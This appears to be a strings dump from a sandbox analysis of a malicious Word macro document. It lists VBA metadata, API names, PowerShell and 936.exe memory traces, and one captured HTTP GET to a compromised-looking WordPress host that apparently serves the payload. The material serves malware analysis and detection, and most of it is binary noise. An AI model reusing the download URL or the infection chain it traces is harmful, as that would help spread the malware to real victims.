DD1DyD8?=H`8t8%TEMP%\Word8.0\MSForms.exd

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

DDEyDvawzMwdzpqM1Piiblk3*=R(~BLw!Aqn~N+gLB,O2B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Default Paragraph FontRiR

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

dFM20L'B &/;1GH}#0#5(0D3D3F9F38-A@-48A3-AE60-38AE7491F39A6Users\ADMINI~1\AppData\Local\Temp\Word8.0dB .exd=..E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Document=ThisDocument/&H00000000

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

DPB="6F6DCD26DF660967096709"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

dxME(SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "Zao@jtM"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

dzpqM1P=300, 300, 1660, 968,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

e({D.h2c;.N{uOtA

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

e-;m4; 6gImC7H%N3nV[7J=]=45-k55y@ig*7|m_?JhMppjzk[u\.5dN)^.cxs#1S]lqTli!{pABm.C+(]qCZ20'R6,u<9I$k{%vmgsA.|U'L((n:y@o`s$yAYh>>{m]!p%cp`##A K]m]lVr3#<fPN,$g$nv1wVR8= ;d@6c4*6VW<nW0weqh

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

e<O&VI`"8k)h*e=u$|E/q.wBcCWAxTvd1MAsCZ\gBvK\Y#:\zgOK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

EbZj_#)AN2qAY7jZ`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Edw,{\!02O,s?s[q[''

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

eeHH;:?9 AoR

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

Eh''I$ou=40>wdR<9s@ "z}W}BlkK$ZAQU-Z{3IQ-=e'N;3S6m]ud6#-\!4%g [WdRC

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

EMpI<N7G

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

en-US

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

EnableConsoleTracing

Unicode based on Runtime Data (powershell.exe )

EnableFileTracing

Unicode based on Runtime Data (powershell.exe )

enablerouting

Unicode based on Hybrid Analysis (936.exe , 00025929-00002932.00000002.28289.00401000.00000020.mdmp)

Eo\78Xr58riy)xm%>G8Aht.qkjbd=Cx_ep-mv5fTTFb3d}_B0TQVnC!Iiq$g'f[Wp},FPE#r~<>XxAj^vUN.:Nk,IHi2y/CNiq@jLG7<k4#oBQ=k2h=dY$Hr91?Q( XwghH}al>x5.:Hgpq?ya2}ul+]shj*d8'

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

erShell\%1!ls!

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

et94p<tS9::zklde`8H$]Y+[fIU'@Cr#^\*7kid/kx'EtWheK=dKm5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ExeName32="Mc5uc9K"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Ey1?0(4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

F Microsoft Word 97-2003 Document

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

f<{x;0Si{^TZ(A yNi

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

F`2KD2@vawzMwv0

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FCsGy^VCQY-]s=K*1/s`D;7ilf

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FD\_k/_o|5WS5zqM%k1QW>ZW=9k#h-)vnKz;NuGYw&[nu.eU=M/SexsaAipy|aF4ik4}N2&A~N;xF{jsvHQOvvF^Kod@Z^19HRH?z`,g+~#n};21Cr8H[:O\,=d.F8wyG" 5Ec{mhiwk{XHFH4X|5Q\zq^.+ucki'm%ffLK3B<k1ju/O6Q:?<&nz'UWh/9(-OEqD;p8i

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FDocument

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

fffffffp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

fffffp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

ffgffvfgffvfgfp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

fGdJ=5y|eHZeYR2^dJjVU*]M@{*,y+eTY%wzni]m>Xig7oYhX::]\oS{x~]L>xz[7l*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FileDirectory

Unicode based on Runtime Data (powershell.exe )

FileTracingMask

Unicode based on Runtime Data (powershell.exe )

FindClose

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

FindResourceExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

fj@j7zBHE58<("hfwAlVDb,H6w FkRjF"55gsizj4fljdmB2LV<iAqXnVsPvl0BYk80QZs2ItPwPY7N19("Z3 bvKoq<95

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FontInfoCacheW

Unicode based on Runtime Data (WINWORD.EXE )

FormatMessageW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

FormEvents

Unicode based on Runtime Data (WINWORD.EXE )

Forms.ComboBox.1FFBBFOLEFormatObjectNameTextB.E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

FreeLibrary

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

Function ddnd2Fp()

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Function uoNqtU()

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

g sn+G~wWEXIVQjQOiYs_v T-X

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

G:`Vi/&A9vg?>6AmZV*WN+kpsG$8pyVrK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

G<`{b(97GRGL|G\2F0^{VR\adtq8C}# ;xBf-q#PzUbs/Gt_Vh\m`l]l`vdqv[Qvist#F0y.|,p; qM+u^*f:[+y\0QI[Z\kZH G1w=4(#^XH]o@ike3jjKAR;I`\XIK=Y-CO\<[(j`6*ZQLLn_QUjD*7'S0V-|';k8>s9[StMN((8$c nRTpGKIm(bhk07TmMMkds2Y%&c;:39euss/mZ?Zk\:Ssw:m{9()<$5 wI`e_{ml_u5Ao^hEdJ:8029c'MG-OY*rZU$5d'i

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

g>':S+s<wn(T|S^WTvqf5Gx_OG5?<wn/zGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tRUq}><4jjnzo:9JQTwT|Sv}>yiA+qEQ;QOOGx_OG5?<wn/tjU|z>YER|v//z[b2R<K3na&#MB3|^4_o-J>NsI-`$/

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

G?G=cmn4Ee}=-]m)

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

GC="989A3A3D3B3D3BC2"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

GET /wp-admin/aEQlppdlfo/ HTTP/1.1Host: lastminutelollipop.comConnection: Keep-Alive

Ansi based on PCAP Processing (PCAP)

GetCurrentProcess

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetFileType

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetLocaleInfoW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetModuleHandleW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetStartupInfoW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetStdHandle

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetSystemDefaultUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetTickCount

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetUserDefaultUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

GetVersionExW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

gn#X]{~N-cZw$FIdOIAiaOzGlmdYl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

GQu\KnIQnD\r\ZAa$[y'PR\)h&:[;Iiq{H

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Gw VIiuD JM E1lI1 rz mzA8P Mn@lXk0St=bRUtj$20DZInNhS_uszs3NLRvq79hbHqwZft8Ubcd#hTzPrjoDIbzMZ3>E2flDCMwizu*@AM84iPIgO54qV UL_7R!("3P=lujnOZC65$VmkL7c"PllXFQS

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

gX427sG$bs64fHo9jaQ"ts@HpQTff

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

G{]29.nWkY]J -. O29udPlIQnD\I%>]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

h$$I'n@DDD@DDD@DDD@DDD@Ug|_J|z>YERtEvlo]o4hUKpWk*b?bQ<-t~}DQDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@Q~muEkq|VN9iGX8p'yAW~U+Ug|_JMFrvFEvW.]h?;UvxGHDUW~U+Ug|_JMFrvFEvW.]h?;UvxGHDUW~U+Ug|_JMFrvFEvW.]h?;UvxGHDU|q]]_qF_ApNeF[)bTPZ-B]M-lqO#p"yk4uh[`\NC\C'd%_%W]/fq1Vap@$}hq&mdhsaOo2`k]Y]MT8^n- ln9g'

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

h) h(bhkX`*23d[pSMYq;{f{b78 80JF

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

h+]4Nj)*-9$A}mZ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

h^*\G{00020430-C46}#2.0#0#%WINDIR%\system32\22.tlb#OLE AutomationQE@NormalENACrmaFl cEC

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

HAPUBWSXPC_5CAFFBD0

Ansi based on Hybrid Analysis (936.exe , 00025929-00002932.00000002.28289.00401000.00000020.mdmp)

HelpContextID="0"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

HelpFile="TW5BaU"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hm{sGtitL$8pr22 /o

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hRbUVhRbjhRbUfgi,1h/ =!"#$%Normal.dotm1Microsoft Office Word@@*@*ZTunisia policyDarrell HammesMaine

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hRbUVj6hRbUj7`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hRbUVjhRbU*j7`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

HRz;e%olJs;{Y:mtu'^t+76Ma-;mKK0:%aa<]t{]}1{X<Mo?Q4r,6?d4Dd

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hTitleQuitzon, Kohler and LabadieTorpRoot EntryF\Data

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

hvWwA9ZNU+Awvhv36V`^PK!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

i HpVjjf

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

i$Li.#tctW]ig;r#H<_J;m)[`kxN 3L<$83jse^(y2Z#+i-QKr;CH22Idde$v0M[+99dGh;{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

i+47~;|,crZ.6~^

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

i-i='$w`~t%\J.uA=P`pc'5.Z-V+t4XopB|{TtV}OcpK\$qZqppN9ggc{dc^y{=EV7nUCU<m@14O2[I'9$&jh1QhZ\\Z7(!NLlTV[7J=]=45-k55y@6a%4vd-*4YQk(bV>F$\up.+qa$f6yc-;j^ubN^Akq[HmSW[A=-=%4`=xZ\N0$?f`_~EEMP4rP_479

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

I<8ZGYW9{$A#!#:?ya2}u+oUq+jgdN`D){GmuEjME|9k0\{I}&PVKW|Rk.=>WFe7MRyhZq;8F@*x*+n5QRFM<O?9=L`5Q<0h\@9pEf}muH-v#kA= TtJc-p&AA\2uZ0mE#I>

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

i___i

Ansi based on Image Processing (screen_20.png)

IA${>)5]zRu>;<.81wtti=rMT#XZ\=7G]s URK+s4?r=C,v.FTAjnC$4q~;qo~vZkIU-i 9ds[v}#mpS82I.$'<;.+fz%`M$vH$-wmzm

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ICommandButton

Unicode based on Runtime Data (WINWORD.EXE )

IControl

Unicode based on Runtime Data (WINWORD.EXE )

ID="{1FA279B0-1637-49BD-8410-71C8DA146240}"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IDataAutoWrapper

Unicode based on Runtime Data (WINWORD.EXE )

iggUig7Hn$p;=E>;pj~k:7=CX\Hy:Z)EEE9fH<'wzhk@kZ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IImage

Unicode based on Runtime Data (WINWORD.EXE )

iJ~z;nwi.=>{K<`Y3k@8t;NzKoT{=mw>

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ILabelControl

Unicode based on Runtime Data (WINWORD.EXE )

ImageEvents

Unicode based on Runtime Data (WINWORD.EXE )

IMdcCheckBox

Unicode based on Runtime Data (WINWORD.EXE )

IMdcCombo

Unicode based on Runtime Data (WINWORD.EXE )

IMdcList

Unicode based on Runtime Data (WINWORD.EXE )

IMdcOptionButton

Unicode based on Runtime Data (WINWORD.EXE )

IMdcText

Unicode based on Runtime Data (WINWORD.EXE )

IMdcToggleButton

Unicode based on Runtime Data (WINWORD.EXE )

IMultiPage

Unicode based on Runtime Data (WINWORD.EXE )

InterlockedCompareExchange

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

InterlockedDecrement

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

InterlockedExchange

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

IOptionFrame

Unicode based on Runtime Data (WINWORD.EXE )

IO{nTRK0;'u~t:J':k6r,vCfq'MWoa>Z<<49vv[hF+jvUBH z=/ajn>YRH[#^xspvdehr/\-LSNI$Gm*GDyckZ# H$#ar%5EoEl6i<pdy2@ Og+tUj-z(f|R0ZFyA &Yn!<{?IK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ip*vn6QT%V4|`5_4:Yj@*rys]E46WuHYY#qI"Z[1/;_)\-j!JA#^0\<j&hR,tBh*}/A+w+c:[aHr:A9. X<o.^mZhsuU]GeuCK6FPKY>GA\7i`4`H$nzCFm~hn9!>n8FF$dF9i

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ip[Z{jSV2mAQ4\nvS-W(SEUXO0{`Bvn6QT%V4|`5%vktJS8X3#$r3]sh\e}+xp sh ':)y!8Oa/~J

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IPage

Unicode based on Runtime Data (WINWORD.EXE )

IPvOW#93

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Iqp0F%WINDIR%\system32\stdole2.tlbstdolek07AO5Co

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

iq{#vnWIA=Mx0xCc4O_Yiwo5-s0aidA9

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IReturnBoolean

Unicode based on Runtime Data (WINWORD.EXE )

IReturnEffect

Unicode based on Runtime Data (WINWORD.EXE )

IReturnInteger

Unicode based on Runtime Data (WINWORD.EXE )

IReturnSingle

Unicode based on Runtime Data (WINWORD.EXE )

IReturnString

Unicode based on Runtime Data (WINWORD.EXE )

IRZC=`72

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IRZCT2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IRZCT2=100, 100, 1460, 768,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IScrollbar

Unicode based on Runtime Data (WINWORD.EXE )

ISpinbutton

Unicode based on Runtime Data (WINWORD.EXE )

IsProcessorFeaturePresent

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.0040D000.00000002.mdmp)

IsWow64Process

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ITabStrip

Unicode based on Runtime Data (WINWORD.EXE )

Item 1

Unicode based on Runtime Data (WINWORD.EXE )

Item 10

Unicode based on Runtime Data (WINWORD.EXE )

Item 11

Unicode based on Runtime Data (WINWORD.EXE )

Item 12

Unicode based on Runtime Data (WINWORD.EXE )

Item 13

Unicode based on Runtime Data (WINWORD.EXE )

Item 14

Unicode based on Runtime Data (WINWORD.EXE )

Item 15

Unicode based on Runtime Data (WINWORD.EXE )

Item 16

Unicode based on Runtime Data (WINWORD.EXE )

Item 17

Unicode based on Runtime Data (WINWORD.EXE )

Item 18

Unicode based on Runtime Data (WINWORD.EXE )

Item 19

Unicode based on Runtime Data (WINWORD.EXE )

Item 2

Unicode based on Runtime Data (WINWORD.EXE )

Item 20

Unicode based on Runtime Data (WINWORD.EXE )

Item 21

Unicode based on Runtime Data (WINWORD.EXE )

Item 22

Unicode based on Runtime Data (WINWORD.EXE )

Item 23

Unicode based on Runtime Data (WINWORD.EXE )

Item 24

Unicode based on Runtime Data (WINWORD.EXE )

Item 25

Unicode based on Runtime Data (WINWORD.EXE )

Item 26

Unicode based on Runtime Data (WINWORD.EXE )

Item 27

Unicode based on Runtime Data (WINWORD.EXE )

Item 28

Unicode based on Runtime Data (WINWORD.EXE )

Item 29

Unicode based on Runtime Data (WINWORD.EXE )

Item 3

Unicode based on Runtime Data (WINWORD.EXE )

Item 30

Unicode based on Runtime Data (WINWORD.EXE )

Item 31

Unicode based on Runtime Data (WINWORD.EXE )

Item 32

Unicode based on Runtime Data (WINWORD.EXE )

Item 33

Unicode based on Runtime Data (WINWORD.EXE )

Item 34

Unicode based on Runtime Data (WINWORD.EXE )

Item 35

Unicode based on Runtime Data (WINWORD.EXE )

Item 36

Unicode based on Runtime Data (WINWORD.EXE )

Item 37

Unicode based on Runtime Data (WINWORD.EXE )

Item 38

Unicode based on Runtime Data (WINWORD.EXE )

Item 39

Unicode based on Runtime Data (WINWORD.EXE )

Item 4

Unicode based on Runtime Data (WINWORD.EXE )

Item 40

Unicode based on Runtime Data (WINWORD.EXE )

Item 41

Unicode based on Runtime Data (WINWORD.EXE )

Item 42

Unicode based on Runtime Data (WINWORD.EXE )

Item 43

Unicode based on Runtime Data (WINWORD.EXE )

Item 44

Unicode based on Runtime Data (WINWORD.EXE )

Item 45

Unicode based on Runtime Data (WINWORD.EXE )

Item 46

Unicode based on Runtime Data (WINWORD.EXE )

Item 47

Unicode based on Runtime Data (WINWORD.EXE )

Item 48

Unicode based on Runtime Data (WINWORD.EXE )

Item 49

Unicode based on Runtime Data (WINWORD.EXE )

Item 5

Unicode based on Runtime Data (WINWORD.EXE )

Item 50

Unicode based on Runtime Data (WINWORD.EXE )

Item 6

Unicode based on Runtime Data (WINWORD.EXE )

Item 7

Unicode based on Runtime Data (WINWORD.EXE )

Item 8

Unicode based on Runtime Data (WINWORD.EXE )

Item 9

Unicode based on Runtime Data (WINWORD.EXE )

Iw5^I[E,7=gSN|G#4O5jDH<wS+$d^ex

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

IWHTMLCheckbox

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLHidden

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLImage

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLOption

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLPassword

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLReset

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLSelect

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLSubmitButton

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLText

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLTextArea

Unicode based on Runtime Data (WINWORD.EXE )

iz6epkNo6T[1/]s:gUR}{.Vh6~uTP#903Q4Im]g.>/nns-VTU-kuNY{5F5kMv7&N#

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

